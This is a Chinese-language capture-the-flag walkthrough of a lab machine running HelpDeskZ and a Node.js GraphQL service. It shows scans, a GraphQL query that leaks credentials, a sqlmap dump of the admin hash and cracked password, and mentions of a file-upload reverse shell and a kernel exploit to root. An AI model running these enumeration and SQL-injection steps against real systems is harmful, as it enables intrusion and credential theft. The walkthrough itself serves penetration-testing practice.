基本信息

端口扫描

22,80,3000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ nmap -sC -sV -Pn 10.10.10.121

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 14:34 CST
Nmap scan report for 10.10.10.121
Host is up (0.067s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.47 seconds

80

apache默认页面:

3000

目录扫描

helpdeskz

80发现support,是helpdesk,用的开源HelpDeskZ :

1
2
3
4
gobuster dir -u http://10.10.10.121/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/javascript           (Status: 301) [Size: 317] [--> http://10.10.10.121/javascript/]
/support              (Status: 301) [Size: 314] [--> http://10.10.10.121/support/]

根据README.md知道版本是1.0.2

graphql

3000根据提示可以搜到是graphql,硬扫也能扫到:

1
2
3
gobuster dir -u http://10.10.10.121:3000/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50

/graphql              (Status: 400) [Size: 18]

graphql

可以手工枚举,也可以用插件,得到query格式,根据格式得到用户密码:

1
2
3
{"data":{"user":{"password":"5d3c93182bb20f07b994a7f617e99cff","username":"helpme@helpme.com"}}}

godhelpmeplz

helpdeskz

搜到两个漏洞:

sql注入

已有账号密码,登录进去:

可以直接sqlmap,得到admin密码:

1
2
3
4
5
6
7
8
9
10
sqlmap -r sql.txt -v 3 --level 3 --batch --threads=10 -D support -T staff --dump

Database: support
Table: staff
[1 entry]
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+
| id | admin | login      | email              | status | avatar | username | fullname      | timezone | password                                            | signature                      | last_login | department         | newticket_notification |
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+
| 1  | 1     | 1547216217 | support@mysite.com | Enable | NULL   | admin    | Administrator | <blank>  | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | Best regards,\r\nAdministrator | 1543429746 | a:1:{i:0;s:1:"1";} | 0                      |
+----+-------+------------+--------------------+--------+--------+----------+---------------+----------+-----------------------------------------------------+--------------------------------+------------+--------------------+------------------------+

文件上传 getshell

也可以通过文件上传方式,上传php提示不允许,实际上已上传,需要找到文件名,然后就可以reverse shell:

user flag

ssh使用得到的密码登录,或者使用文件上传得到的help shell,得到user.txt:

提权信息

内核提权:

1
2
help@help:~$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

提权 & root flag

任意一个可用exp,提到root,读取root.txt:

参考资料